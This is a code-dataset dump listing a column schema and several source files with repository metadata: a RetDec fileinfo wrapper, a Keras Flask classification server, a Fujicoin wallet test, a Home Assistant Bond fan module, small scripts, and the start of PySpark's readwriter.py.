Dataset schema (one row per source file; ⌀ marks a nullable column):

| column | type | range |
|---|---|---|
| hexsha | string | length 40 |
| size | int64 | 3 to 1.03M |
| ext | string | 10 classes |
| lang | string | 1 class |
| max_stars_repo_path | string | length 3 to 972 |
| max_stars_repo_name | string | length 6 to 130 |
| max_stars_repo_head_hexsha | string | length 40 to 78 |
| max_stars_repo_licenses | list | 1 to 10 items |
| max_stars_count | int64 ⌀ | 1 to 191k |
| max_stars_repo_stars_event_min_datetime | string ⌀ | length 24 |
| max_stars_repo_stars_event_max_datetime | string ⌀ | length 24 |
| max_issues_repo_path | string | length 3 to 972 |
| max_issues_repo_name | string | length 6 to 130 |
| max_issues_repo_head_hexsha | string | length 40 to 78 |
| max_issues_repo_licenses | list | 1 to 10 items |
| max_issues_count | int64 ⌀ | 1 to 116k |
| max_issues_repo_issues_event_min_datetime | string ⌀ | length 24 |
| max_issues_repo_issues_event_max_datetime | string ⌀ | length 24 |
| max_forks_repo_path | string | length 3 to 972 |
| max_forks_repo_name | string | length 6 to 130 |
| max_forks_repo_head_hexsha | string | length 40 to 78 |
| max_forks_repo_licenses | list | 1 to 10 items |
| max_forks_count | int64 ⌀ | 1 to 105k |
| max_forks_repo_forks_event_min_datetime | string ⌀ | length 24 |
| max_forks_repo_forks_event_max_datetime | string ⌀ | length 24 |
| content | string | length 3 to 1.03M |
| avg_line_length | float64 | 1.13 to 941k |
| max_line_length | int64 | 2 to 941k |
| alphanum_fraction | float64 | 0 to 1 |
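A hedged sketch of consuming rows with this schema via the Hugging Face datasets library; the dataset ID below is a hypothetical stand-in, since this dump does not name the dataset:

from datasets import load_dataset

# stream rows lazily instead of downloading the whole dataset;
# "some-org/some-code-dataset" is a placeholder ID, not confirmed by this dump
ds = load_dataset("some-org/some-code-dataset", split="train", streaming=True)
for row in ds.take(1):
    print(row["max_stars_repo_path"], row["size"], row["alphanum_fraction"])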
1277841e08fd645ad660098a4ab6d569cb37a919 | 2,638 | py | Python | third_party/retdec-3.2/scripts/retdec-fileinfo.py | Fimbure/icebox-1 | 0b81992a53e1b410955ca89bdb6f8169d6f2da86 | ["MIT"] | 521 | 2019-03-29T15:44:08.000Z | 2022-03-22T09:46:19.000Z | third_party/retdec-3.2/scripts/retdec-fileinfo.py | Fimbure/icebox-1 | 0b81992a53e1b410955ca89bdb6f8169d6f2da86 | ["MIT"] | 30 | 2019-06-04T17:00:49.000Z | 2021-09-08T20:44:19.000Z | third_party/retdec-3.2/scripts/retdec-fileinfo.py | Fimbure/icebox-1 | 0b81992a53e1b410955ca89bdb6f8169d6f2da86 | ["MIT"] | 99 | 2019-03-29T16:04:13.000Z | 2022-03-28T16:59:34.000Z |
#!/usr/bin/env python3
"""A wrapper for fileinfo that:
- also uses external YARA patterns,
- is able to analyze archives (.a/.lib files).
"""
import argparse
import subprocess
import sys
import importlib
config = importlib.import_module('retdec-config')
utils = importlib.import_module('retdec-utils')
retdec_archive_decompiler = importlib.import_module('retdec-archive-decompiler')
ArchiveDecompiler = retdec_archive_decompiler.ArchiveDecompiler
sys.stdout = utils.Unbuffered(sys.stdout)
def parse_args():
parser = argparse.ArgumentParser(
description=__doc__,
formatter_class=argparse.RawDescriptionHelpFormatter
)
parser.add_argument('-j', '--json',
dest='json',
action='store_true',
help='Set to forward --json to the archive decompilation script.')
parser.add_argument('--use-external-patterns',
dest='external_patterns',
action='store_true',
                        help='Also use external YARA patterns.')
return parser.parse_known_args()
def get_input_file(unknownargs):
"""Find path to the input file.
We take the first parameter that does not start with a dash. This is a
simplification and may not work in all cases. A proper solution would
need to parse fileinfo parameters, which would be complex.
"""
for arg in unknownargs:
if not arg.startswith('-'):
return arg
return None
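# e.g. get_input_file(['--verbose', 'sample.exe']) returns 'sample.exe'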
def main():
args, unknownargs = parse_args()
input = get_input_file(unknownargs)
# When analyzing an archive, use the archive decompilation script `--list`
# instead of `fileinfo` because fileinfo is currently unable to analyze
# archives.
if input and utils.has_archive_signature(input):
archive_decompiler_args = [input, '--list']
if args.json:
archive_decompiler_args.append('--json')
decompiler = ArchiveDecompiler(archive_decompiler_args)
sys.exit(decompiler.decompile_archive())
# We are not analyzing an archive, so proceed to fileinfo.
fileinfo_params = unknownargs
if args.json:
fileinfo_params.append('--json')
for par in config.FILEINFO_EXTERNAL_YARA_PRIMARY_CRYPTO_DATABASES:
fileinfo_params.extend(['--crypto', par])
if args.external_patterns:
for par in config.FILEINFO_EXTERNAL_YARA_EXTRA_CRYPTO_DATABASES:
fileinfo_params.extend(['--crypto', par])
_, ret, _ = utils.CmdRunner().run_cmd([config.FILEINFO] + fileinfo_params)
sys.exit(ret)
if __name__ == "__main__":
main()
| 29.640449 | 90 | 0.674375 |
1f766fb2fa0946c33e73a72f8e681c6605060b1b | 4,631 | py | Python | rest_api/run_keras_server.py | mmstevenson/CritterCounter | ecf75292c5e2a7b6f1e1862320e50d0de53965a2 | ["MIT"] | null | null | null | rest_api/run_keras_server.py | mmstevenson/CritterCounter | ecf75292c5e2a7b6f1e1862320e50d0de53965a2 | ["MIT"] | null | null | null | rest_api/run_keras_server.py | mmstevenson/CritterCounter | ecf75292c5e2a7b6f1e1862320e50d0de53965a2 | ["MIT"] | null | null | null |
# USAGE
# Start the server:
# python run_keras_server.py
# Submit a request via cURL:
# curl -X POST -F image=@dog.jpg 'http://localhost:5000/predict'
# Submit a request via Python:
# python simple_request.py
# import the necessary packages
from keras.applications import ResNet50, MobileNetV2
from keras.preprocessing.image import img_to_array
from keras.applications import imagenet_utils
import tensorflow as tf
from PIL import Image
import numpy as np
import flask
import io
import time
import os
# initialize our Flask application and the Keras model
app = flask.Flask(__name__)
model = None
def load_model():
# load the pre-trained Keras model (here we are using a model
# pre-trained on ImageNet and provided by Keras, but you can
# substitute in your own networks just as easily)
global model
model = ResNet50(weights="imagenet")
# model = MobileNetV2(weights="imagenet")
global graph
graph = tf.get_default_graph()
def prepare_image(image, target):
# if the image mode is not RGB, convert it
if image.mode != "RGB":
image = image.convert("RGB")
# resize the input image and preprocess it
image = image.resize(target)
image = img_to_array(image)
image = np.expand_dims(image, axis=0)
image = imagenet_utils.preprocess_input(image)
# return the processed image
return image
@app.route("/predict", methods=["POST"])
def predict():
# initialize the data dictionary that will be returned from the
# view
start = time.time()
data = {"success": False}
# ensure an image was properly uploaded to our endpoint
if flask.request.method == "POST":
if flask.request.files.get("image"):
# read the image in PIL format
image = flask.request.files["image"].read()
image = Image.open(io.BytesIO(image))
# preprocess the image and prepare it for classification
image = prepare_image(image, target=(224, 224))
# classify the input image and then initialize the list
# of predictions to return to the client
with graph.as_default():
preds = model.predict(image)
results = imagenet_utils.decode_predictions(preds)
data["predictions"] = []
# loop over the results and add them to the list of
# returned predictions
for (imagenetID, label, prob) in results[0]:
r = {"label": label, "probability": float(prob)}
data["predictions"].append(r)
# indicate that the request was a success
data["success"] = True
# Send classification time
data["predict_time"] = time.time() - start
# return the data dictionary as a JSON response
return flask.jsonify(data)
@app.route("/predictFolder", methods=["POST"])
def predict_folder():
# initialize the data dictionary that will be returned from the
# view
start = time.time()
data = {"success": False}
# ensure an image was properly uploaded to our endpoint
if flask.request.method == "POST":
if flask.request.files.get("path"):
for file in os.listdir(path):
# read the image in PIL format
image = flask.request.files["image"].read()
image = Image.open(io.BytesIO(image))
# preprocess the image and prepare it for classification
image = prepare_image(image, target=(224, 224))
# classify the input image and then initialize the list
# of predictions to return to the client
with graph.as_default():
preds = model.predict(image)
results = imagenet_utils.decode_predictions(preds)
data["predictions"] = []
# loop over the results and add them to the list of
# returned predictions
for (imagenetID, label, prob) in results[0]:
r = {"label": label, "probability": float(prob)}
data["predictions"].append(r)
# indicate that the request was a success
data["success"] = True
# Send classification time
data["predict_time"] = time.time() - start
# return the data dictionary as a JSON response
return flask.jsonify(data)
# if this is the main thread of execution first load the model and
# then start the server
if __name__ == "__main__":
print(("* Loading Keras model and Flask starting server..."
"please wait until server has fully started"))
load_model()
app.run(host='0.0.0.0', debug=False)
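The USAGE header above also mentions a simple_request.py client that is not part of this file. Below is a minimal stand-in sketch consistent with the cURL example; the endpoint URL and the dog.jpg filename are assumptions carried over from the comments, not confirmed elsewhere:

import requests

# POST the image as multipart/form-data, mirroring `curl -F image=@dog.jpg`
url = "http://localhost:5000/predict"
with open("dog.jpg", "rb") as f:
    r = requests.post(url, files={"image": f})
payload = r.json()
if payload["success"]:
    for p in payload["predictions"]:
        print(p["label"], p["probability"])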
| 33.078571 | 68 | 0.638523 |
80679119a8a98dc03eb0e9fecaaf0f130ef0225e | 6,842 | py | Python | test/functional/wallet_labels.py | fujicoin/fujicoin-0.20.0 | 2bed6d064ce44ada8bf3263fc2138029b78a8011 | ["MIT"] | null | null | null | test/functional/wallet_labels.py | fujicoin/fujicoin-0.20.0 | 2bed6d064ce44ada8bf3263fc2138029b78a8011 | ["MIT"] | null | null | null | test/functional/wallet_labels.py | fujicoin/fujicoin-0.20.0 | 2bed6d064ce44ada8bf3263fc2138029b78a8011 | ["MIT"] | 1 | 2021-07-18T11:40:12.000Z | 2021-07-18T11:40:12.000Z |
#!/usr/bin/env python3
# Copyright (c) 2016-2020 The Fujicoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test label RPCs.
RPCs tested are:
- getaddressesbylabel
- listaddressgroupings
- setlabel
"""
from collections import defaultdict
from test_framework.test_framework import FujicoinTestFramework
from test_framework.util import assert_equal, assert_raises_rpc_error
from test_framework.wallet_util import test_address
class WalletLabelsTest(FujicoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def run_test(self):
# Check that there's no UTXO on the node
node = self.nodes[0]
assert_equal(len(node.listunspent()), 0)
# Note each time we call generate, all generated coins go into
# the same address, so we call twice to get two addresses w/50 each
node.generatetoaddress(nblocks=1, address=node.getnewaddress(label='coinbase'))
node.generatetoaddress(nblocks=101, address=node.getnewaddress(label='coinbase'))
assert_equal(node.getbalance(), 100)
# there should be 2 address groups
# each with 1 address with a balance of 50 Fujicoins
address_groups = node.listaddressgroupings()
assert_equal(len(address_groups), 2)
# the addresses aren't linked now, but will be after we send to the
# common address
linked_addresses = set()
for address_group in address_groups:
assert_equal(len(address_group), 1)
assert_equal(len(address_group[0]), 3)
assert_equal(address_group[0][1], 50)
assert_equal(address_group[0][2], 'coinbase')
linked_addresses.add(address_group[0][0])
# send 50 from each address to a third address not in this wallet
common_address = "msf4WtN1YQKXvNtvdFYt9JBnUD2FB41kjr"
node.sendmany(
amounts={common_address: 100},
subtractfeefrom=[common_address],
minconf=1,
)
# there should be 1 address group, with the previously
# unlinked addresses now linked (they both have 0 balance)
address_groups = node.listaddressgroupings()
assert_equal(len(address_groups), 1)
assert_equal(len(address_groups[0]), 2)
assert_equal(set([a[0] for a in address_groups[0]]), linked_addresses)
assert_equal([a[1] for a in address_groups[0]], [0, 0])
node.generate(1)
# we want to reset so that the "" label has what's expected.
# otherwise we're off by exactly the fee amount as that's mined
# and matures in the next 100 blocks
amount_to_send = 1.0
# Create labels and make sure subsequent label API calls
# recognize the label/address associations.
labels = [Label(name) for name in ("a", "b", "c", "d", "e")]
for label in labels:
address = node.getnewaddress(label.name)
label.add_receive_address(address)
label.verify(node)
# Check all labels are returned by listlabels.
assert_equal(node.listlabels(), sorted(['coinbase'] + [label.name for label in labels]))
# Send a transaction to each label.
for label in labels:
node.sendtoaddress(label.addresses[0], amount_to_send)
label.verify(node)
# Check the amounts received.
node.generate(1)
for label in labels:
assert_equal(
node.getreceivedbyaddress(label.addresses[0]), amount_to_send)
assert_equal(node.getreceivedbylabel(label.name), amount_to_send)
for i, label in enumerate(labels):
to_label = labels[(i + 1) % len(labels)]
node.sendtoaddress(to_label.addresses[0], amount_to_send)
node.generate(1)
for label in labels:
address = node.getnewaddress(label.name)
label.add_receive_address(address)
label.verify(node)
assert_equal(node.getreceivedbylabel(label.name), 2)
label.verify(node)
node.generate(101)
# Check that setlabel can assign a label to a new unused address.
for label in labels:
address = node.getnewaddress()
node.setlabel(address, label.name)
label.add_address(address)
label.verify(node)
assert_raises_rpc_error(-11, "No addresses with label", node.getaddressesbylabel, "")
# Check that addmultisigaddress can assign labels.
for label in labels:
addresses = []
for x in range(10):
addresses.append(node.getnewaddress())
multisig_address = node.addmultisigaddress(5, addresses, label.name)['address']
label.add_address(multisig_address)
label.purpose[multisig_address] = "send"
label.verify(node)
node.generate(101)
# Check that setlabel can change the label of an address from a
# different label.
change_label(node, labels[0].addresses[0], labels[0], labels[1])
# Check that setlabel can set the label of an address already
# in the label. This is a no-op.
change_label(node, labels[2].addresses[0], labels[2], labels[2])
class Label:
def __init__(self, name):
# Label name
self.name = name
# Current receiving address associated with this label.
self.receive_address = None
# List of all addresses assigned with this label
self.addresses = []
# Map of address to address purpose
self.purpose = defaultdict(lambda: "receive")
def add_address(self, address):
assert_equal(address not in self.addresses, True)
self.addresses.append(address)
def add_receive_address(self, address):
self.add_address(address)
def verify(self, node):
if self.receive_address is not None:
assert self.receive_address in self.addresses
for address in self.addresses:
test_address(node, address, labels=[self.name])
assert self.name in node.listlabels()
assert_equal(
node.getaddressesbylabel(self.name),
{address: {"purpose": self.purpose[address]} for address in self.addresses})
def change_label(node, address, old_label, new_label):
assert_equal(address in old_label.addresses, True)
node.setlabel(address, new_label.name)
old_label.addresses.remove(address)
new_label.add_address(address)
old_label.verify(node)
new_label.verify(node)
if __name__ == '__main__':
WalletLabelsTest().main()
| 38.875 | 97 | 0.652587 |
80ae5d7f6ac2d638e44677cadfdb307ba58f13f8 | 4,018 | py | Python | homeassistant/components/bond/fan.py | alexciurea/core | bbff9ff6a0903cfcd1316b19db4d822b29e74884 | ["Apache-2.0"] | 2 | 2020-09-10T15:36:55.000Z | 2021-02-26T21:09:56.000Z | homeassistant/components/bond/fan.py | frnktrgr/core | 650d61e4f3007d1f7d456713d43fbc30b7396ce6 | ["Apache-2.0"] | 40 | 2020-08-05T17:00:26.000Z | 2022-03-04T06:01:46.000Z | homeassistant/components/bond/fan.py | DubhAd/home-assistant | 30a7d6233924532775ceb2166d3675380bb3776a | ["Apache-2.0"] | 2 | 2021-01-11T22:51:43.000Z | 2021-08-29T01:25:04.000Z |
"""Support for Bond fans."""
import math
from typing import Any, Callable, List, Optional
from bond import DeviceTypes, Directions
from homeassistant.components.fan import (
DIRECTION_FORWARD,
DIRECTION_REVERSE,
SPEED_HIGH,
SPEED_LOW,
SPEED_MEDIUM,
SPEED_OFF,
SUPPORT_DIRECTION,
SUPPORT_SET_SPEED,
FanEntity,
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.core import HomeAssistant
from homeassistant.helpers.entity import Entity
from .const import DOMAIN
from .entity import BondEntity
from .utils import BondDevice, BondHub
async def async_setup_entry(
hass: HomeAssistant,
entry: ConfigEntry,
async_add_entities: Callable[[List[Entity], bool], None],
) -> None:
"""Set up Bond fan devices."""
hub: BondHub = hass.data[DOMAIN][entry.entry_id]
fans = [
BondFan(hub, device)
for device in hub.devices
if device.type == DeviceTypes.CEILING_FAN
]
async_add_entities(fans, True)
class BondFan(BondEntity, FanEntity):
"""Representation of a Bond fan."""
def __init__(self, hub: BondHub, device: BondDevice):
"""Create HA entity representing Bond fan."""
super().__init__(hub, device)
self._power: Optional[bool] = None
self._speed: Optional[int] = None
self._direction: Optional[int] = None
@property
def supported_features(self) -> int:
"""Flag supported features."""
features = 0
if self._device.supports_speed():
features |= SUPPORT_SET_SPEED
if self._device.supports_direction():
features |= SUPPORT_DIRECTION
return features
@property
def speed(self) -> Optional[str]:
"""Return the current speed."""
if self._power == 0:
return SPEED_OFF
if not self._power or not self._speed:
return None
# map 1..max_speed Bond speed to 1..3 HA speed
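        # e.g. with max_speed=6 and _speed=4: ceil(4 * 3 / 6) = 2 -> SPEED_MEDIUM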
max_speed = self._device.props.get("max_speed", 3)
ha_speed = math.ceil(self._speed * (len(self.speed_list) - 1) / max_speed)
return self.speed_list[ha_speed]
@property
def speed_list(self) -> list:
"""Get the list of available speeds."""
return [SPEED_OFF, SPEED_LOW, SPEED_MEDIUM, SPEED_HIGH]
@property
def current_direction(self) -> Optional[str]:
"""Return fan rotation direction."""
direction = None
if self._direction == Directions.FORWARD:
direction = DIRECTION_FORWARD
elif self._direction == Directions.REVERSE:
direction = DIRECTION_REVERSE
return direction
def update(self):
"""Fetch assumed state of the fan from the hub using API."""
state: dict = self._hub.bond.getDeviceState(self._device.device_id)
self._power = state.get("power")
self._speed = state.get("speed")
self._direction = state.get("direction")
def set_speed(self, speed: str) -> None:
"""Set the desired speed for the fan."""
max_speed = self._device.props.get("max_speed", 3)
if speed == SPEED_LOW:
bond_speed = 1
elif speed == SPEED_HIGH:
bond_speed = max_speed
else:
bond_speed = math.ceil(max_speed / 2)
self._hub.bond.setSpeed(self._device.device_id, speed=bond_speed)
def turn_on(self, speed: Optional[str] = None, **kwargs) -> None:
"""Turn on the fan."""
if speed is not None:
self.set_speed(speed)
self._hub.bond.turnOn(self._device.device_id)
def turn_off(self, **kwargs: Any) -> None:
"""Turn the fan off."""
self._hub.bond.turnOff(self._device.device_id)
def set_direction(self, direction: str) -> None:
"""Set fan rotation direction."""
bond_direction = (
Directions.REVERSE if direction == DIRECTION_REVERSE else Directions.FORWARD
)
self._hub.bond.setDirection(self._device.device_id, bond_direction)
| 31.147287 | 88 | 0.640866 |
34708babd5e99e05f7c0d50d9810ccd54ba8451c | 153 | py | Python | python-solutions/problem001.py | omermikhailk/project-euler | 04f71bcd6b7b664245e01b814138bea9ff0caf5e | ["MIT"] | null | null | null | python-solutions/problem001.py | omermikhailk/project-euler | 04f71bcd6b7b664245e01b814138bea9ff0caf5e | ["MIT"] | 1 | 2020-06-04T08:40:49.000Z | 2020-06-04T08:40:49.000Z | python-solutions/problem001.py | omermikhailk/project-euler | 04f71bcd6b7b664245e01b814138bea9ff0caf5e | ["MIT"] | null | null | null |
def sum_of_multiples():
return sum([i for i in range(1, 1000) if not i % 3 or not i % 5])
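# Project Euler problem 1: the sum of all multiples of 3 or 5 below 1000 is 233168.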
if __name__ == "__main__":
print(sum_of_multiples())
| 21.857143 | 69 | 0.640523 |
ed451df2f815a12510ebfe53cd427b39912f745f | 359 | py | Python | codes/2018-02-26-final.py | israelem/aceptaelreto.github.io | 91ac0586ef504cf4b1dd05eda32def6c39fbb34c | ["MIT"] | 4 | 2018-05-10T08:51:04.000Z | 2021-01-13T12:46:15.000Z | codes/2018-02-26-final.py | israelem/aceptaelreto.github.io | 91ac0586ef504cf4b1dd05eda32def6c39fbb34c | ["MIT"] | null | null | null | codes/2018-02-26-final.py | israelem/aceptaelreto.github.io | 91ac0586ef504cf4b1dd05eda32def6c39fbb34c | ["MIT"] | 5 | 2018-05-10T08:51:06.000Z | 2021-12-07T18:04:27.000Z |
from functools import reduce
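# Adds 1 to a dot-separated number and re-inserts the thousands separators,
# e.g. input '1.234.999' -> 1234999 + 1 = 1235000 -> prints '1.235.000'.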
if __name__ == '__main__':
numero = int(reduce(lambda x, y: x + y, [x for x in input().split('.')])) + 1
cadena = ''
for x in range(len(str(numero)) - 1, -1, -3):
if x - 3 >= 0:
cadena += str(numero)[x:x - 3:-1] + '.'
else:
cadena += str(numero)[x::-1]
print(cadena[::-1])
| 29.916667 | 81 | 0.487465 |
1f7807fcab40e5a50f6d056a45a136aea7336d95 | 4,491 | py | Python | data/nces/cleanser.py | mtna/data-public | aeeee98d60e545440bab18356120fb4493d0a35b | ["Apache-2.0", "CC-BY-4.0"] | 2 | 2020-08-28T21:36:11.000Z | 2021-05-05T16:34:52.000Z | data/nces/cleanser.py | mtna/data-public | aeeee98d60e545440bab18356120fb4493d0a35b | ["Apache-2.0", "CC-BY-4.0"] | null | null | null | data/nces/cleanser.py | mtna/data-public | aeeee98d60e545440bab18356120fb4493d0a35b | ["Apache-2.0", "CC-BY-4.0"] | 2 | 2020-10-20T00:45:11.000Z | 2020-10-20T00:47:16.000Z |
import addfips
import pandas as pd
import numpy as np
variables = {
'NCES School ID': 'school_id_nces',
'State School ID': 'school_id_state',
'NCES District ID': 'district_id_nces',
'State District ID': 'district_id_state',
'Low Grade*': 'grade_low',
'High Grade*': 'grade_high',
'School Name': 'school_name',
'District': 'district_name',
'County Name*': 'county_name',
'Street Address': 'street_address',
'City': 'city',
'State': 'state',
'ZIP': 'zip',
'ZIP 4-digit': 'zip_4_digit',
'Phone': 'phone_number',
'Locale Code*': 'locale',
'Locale*': 'locale_name',
'Charter': 'is_charter',
'Magnet*': 'is_magnet',
'Title I School*': 'is_title_1_school',
'Title 1 School Wide*': 'is_title_1_school_wide',
'Students*': 'cnt_students',
'Teachers*': 'cnt_teachers',
'Student Teacher Ratio*': 'student_teacher_ratio',
'Free Lunch*': 'is_lunch_free',
'Reduced Lunch*': 'is_lunch_reduced'
}
def recode_bool(df, col):
for index, row in df.iterrows():
value = row[col]
if value == True:
df.loc[index, col] = 1
elif str(value) == '–' or str(value) == '†':
df.loc[index, col] = None
else:
df.loc[index, col] = 0
return df
if __name__ == "__main__":
# read the combined raw file
df = pd.read_csv('./data/nces/clean/combined_raw.csv', low_memory=False)
# normalizing nces column names
df.rename(variables, axis="columns", inplace=True)
# creating nces county_fips column from state and county_name values
af = addfips.AddFIPS()
state_fips = []
county_fips = []
for key, value in df['county_name'].items():
state = df['state'][key]
if str(state) == "nan":
state_fips.append(None)
else:
state_fips.append(af.get_state_fips(state))
if str(value) == "nan":
county_fips.append(None)
else:
county_fips.append(af.get_county_fips(value, state))
df['us_state_fips'] = state_fips
df['us_county_fips'] = county_fips
# ensure locale has no decimals
df['locale'] = df['locale'].astype(pd.Int32Dtype())
df['grade_low'] = df['grade_low'].astype(str)
df['grade_high'] = df['grade_high'].astype(str)
df['grade_low'] = df['grade_low'].str.replace('nan','')
df['grade_high'] = df['grade_high'].str.replace('nan','')
# 0 pad any ids that do not match the NCES length
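    # e.g. '{0:0>12}'.format('10000500871') -> '010000500871'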
df['school_id_nces'] = df['school_id_nces'].apply(lambda x: '{0:0>12}'.format(x))
df['district_id_nces'] = df['district_id_nces'].apply(lambda x: '{0:0>7}'.format(x))
df['zip'] = df['zip'].apply(lambda x: '{0:0>5}'.format(x))
df['zip_4_digit'] = df['zip_4_digit'].apply(lambda x: '{0:0>4}'.format(x))
df['grade_low'] = df['grade_low'].apply(lambda x: '{0:0>2}'.format(x))
df['grade_high'] = df['grade_high'].apply(lambda x: '{0:0>2}'.format(x))
# cleaning up boolean columns
df['is_charter'] = df['is_charter'].map({'Yes': 1, 'No': 0})
df['is_charter'] = df['is_charter'].astype(pd.Int32Dtype())
df['is_magnet'] = df['is_magnet'].map({'Yes': 1, 'No': 0})
df['is_magnet'] = df['is_magnet'].astype(pd.Int32Dtype())
df['is_title_1_school'] = df['is_title_1_school'].map({'Yes': 1, 'No': 0})
df['is_title_1_school'] = df['is_title_1_school'].astype(pd.Int32Dtype())
df['is_title_1_school_wide'] = df['is_title_1_school_wide'].map({
'Yes': 1, 'No': 0})
df['is_title_1_school_wide'] = df['is_title_1_school_wide'].astype(pd.Int32Dtype())
df['is_lunch_free'] = df['is_lunch_free'].map({'Yes': 1, 'No': 0})
df['is_lunch_free'] = df['is_lunch_free'].astype(pd.Int32Dtype())
df['is_lunch_reduced'] = df['is_lunch_reduced'].map({'Yes': 1, 'No': 0})
df['is_lunch_reduced'] = df['is_lunch_reduced'].astype(pd.Int32Dtype())
# order the variables
df = df[['school_id_nces', 'school_id_state', 'district_id_nces', 'district_id_state', 'grade_low', 'grade_high', 'street_address', 'city', 'us_state_fips', 'us_county_fips',
'zip', 'zip_4_digit', 'phone_number', 'locale', 'cnt_students', 'cnt_teachers', 'student_teacher_ratio', 'is_charter', 'is_magnet', 'is_title_1_school', 'is_title_1_school_wide', 'is_lunch_free', 'is_lunch_reduced']]
# create clean files
    df.to_csv('./data/nces/clean/nces_schools.csv', header=True, index=False)
| 41.201835 | 237 | 0.613894 |
fa680ab3bea477ad27223105a1c355b8afaed08e | 1,415 | py | Python | test/actions/gyptest-generated-header.py | luguocfw/GYP-Tools | 41414159d032530acbf5e426954e1020ea1aa740 | ["BSD-3-Clause"] | 34 | 2015-01-14T03:21:08.000Z | 2020-04-26T10:06:56.000Z | core/deps/gyp/test/actions/gyptest-generated-header.py | K-Constantine/Amaraki | e8736e4754af62a8510c3a5db8a72df48f7681a7 | ["MIT"] | 1 | 2019-03-08T08:07:14.000Z | 2019-03-08T08:07:14.000Z | core/deps/gyp/test/actions/gyptest-generated-header.py | K-Constantine/Amaraki | e8736e4754af62a8510c3a5db8a72df48f7681a7 | ["MIT"] | 29 | 2015-02-13T00:18:53.000Z | 2021-02-10T23:38:58.000Z |
#!/usr/bin/env python
# Copyright (c) 2013 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Verifies that dependencies on generated headers work, even if the header has
a mixed-case file name.
"""
import TestGyp
test = TestGyp.TestGyp()
if test.format == 'android':
# This test currently fails on android. Investigate why, fix the issues
# responsible, and reenable this test on android. See bug:
# https://code.google.com/p/gyp/issues/detail?id=436
test.skip_test(message='Test fails on android. Fix and reenable.\n')
CHDIR = 'generated-header'
test.run_gyp('test.gyp', chdir=CHDIR)
test.build('test.gyp', 'program', chdir=CHDIR)
test.up_to_date('test.gyp', 'program', chdir=CHDIR)
expect = 'foobar output\n'
test.run_built_executable('program', chdir=CHDIR, stdout=expect)
# Change what's written to the generated header, regyp and rebuild, and check
# that the change makes it to the executable and that the build is clean.
test.sleep()
test.write('generated-header/test.gyp',
test.read('generated-header/test.gyp').replace('foobar', 'barbaz'))
test.run_gyp('test.gyp', chdir=CHDIR)
test.build('test.gyp', 'program', chdir=CHDIR)
test.up_to_date('test.gyp', 'program', chdir=CHDIR)
expect = 'barbaz output\n'
test.run_built_executable('program', chdir=CHDIR, stdout=expect)
test.pass_test()
| 31.444444 | 78 | 0.734982 |
3521b64f50fb1f0e17f66c0e376ffd101dae3211 | 663 | py | Python | service-workers/service-worker/navigation-preload/resources/chunked-encoding-scope.py | ziransun/wpt | ab8f451eb39eb198584d547f5d965ef54df2a86a | ["BSD-3-Clause"] | 8 | 2019-04-09T21:13:05.000Z | 2021-11-23T17:25:18.000Z | service-workers/service-worker/navigation-preload/resources/chunked-encoding-scope.py | ziransun/wpt | ab8f451eb39eb198584d547f5d965ef54df2a86a | ["BSD-3-Clause"] | 21 | 2021-03-31T19:48:22.000Z | 2022-03-12T00:24:53.000Z | service-workers/service-worker/navigation-preload/resources/chunked-encoding-scope.py | ziransun/wpt | ab8f451eb39eb198584d547f5d965ef54df2a86a | ["BSD-3-Clause"] | 11 | 2019-04-12T01:20:16.000Z | 2021-11-23T17:25:02.000Z |
import time
def main(request, response):
use_broken_body = 'use_broken_body' in request.GET
response.add_required_headers = False
response.writer.write_status(200)
response.writer.write_header("Content-type", "text/html; charset=UTF-8")
response.writer.write_header("Transfer-encoding", "chunked")
response.writer.end_headers()
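    # each chunk goes on the wire as "<size>\r\n<payload>\r\n"; the broken
    # variant below deliberately writes bare "\n" separators instead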
for idx in range(10):
if use_broken_body:
response.writer.write("%s\n%s\n" % (len(str(idx)), idx))
else:
response.writer.write("%s\r\n%s\r\n" % (len(str(idx)), idx))
response.writer.flush()
time.sleep(0.001)
response.writer.write("0\r\n\r\n")
| 31.571429 | 76 | 0.648567 |
4caad8ffc7c876764f557a7dbddaddd2c135a358 | 44,081 | py | Python | python/pyspark/sql/readwriter.py | leen0304/Spark2.2.0-source-code | 8b50aa40c70654579ff298814ac917b48654f207 | ["BSD-3-Clause-Open-MPI", "PSF-2.0", "Apache-2.0", "BSD-2-Clause", "MIT", "MIT-0", "BSD-3-Clause-No-Nuclear-License-2014", "BSD-3-Clause-Clear", "PostgreSQL", "BSD-3-Clause"] | 675 | 2016-12-21T00:15:05.000Z | 2022-03-31T07:15:59.000Z | python/pyspark/sql/readwriter.py | leen0304/Spark2.2.0-source-code | 8b50aa40c70654579ff298814ac917b48654f207 | ["BSD-3-Clause-Open-MPI", "PSF-2.0", "Apache-2.0", "BSD-2-Clause", "MIT", "MIT-0", "BSD-3-Clause-No-Nuclear-License-2014", "BSD-3-Clause-Clear", "PostgreSQL", "BSD-3-Clause"] | 607 | 2016-12-12T21:56:43.000Z | 2019-11-14T22:21:06.000Z | python/pyspark/sql/readwriter.py | leen0304/Spark2.2.0-source-code | 8b50aa40c70654579ff298814ac917b48654f207 | ["BSD-3-Clause-Open-MPI", "PSF-2.0", "Apache-2.0", "BSD-2-Clause", "MIT", "MIT-0", "BSD-3-Clause-No-Nuclear-License-2014", "BSD-3-Clause-Clear", "PostgreSQL", "BSD-3-Clause"] | 168 | 2017-01-12T00:47:04.000Z | 2021-12-02T08:08:10.000Z |
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import sys
if sys.version >= '3':
basestring = unicode = str
from py4j.java_gateway import JavaClass
from pyspark import RDD, since, keyword_only
from pyspark.rdd import ignore_unicode_prefix
from pyspark.sql.column import _to_seq
from pyspark.sql.types import *
from pyspark.sql import utils
__all__ = ["DataFrameReader", "DataFrameWriter"]
def to_str(value):
"""
A wrapper over str(), but converts bool values to lower case strings.
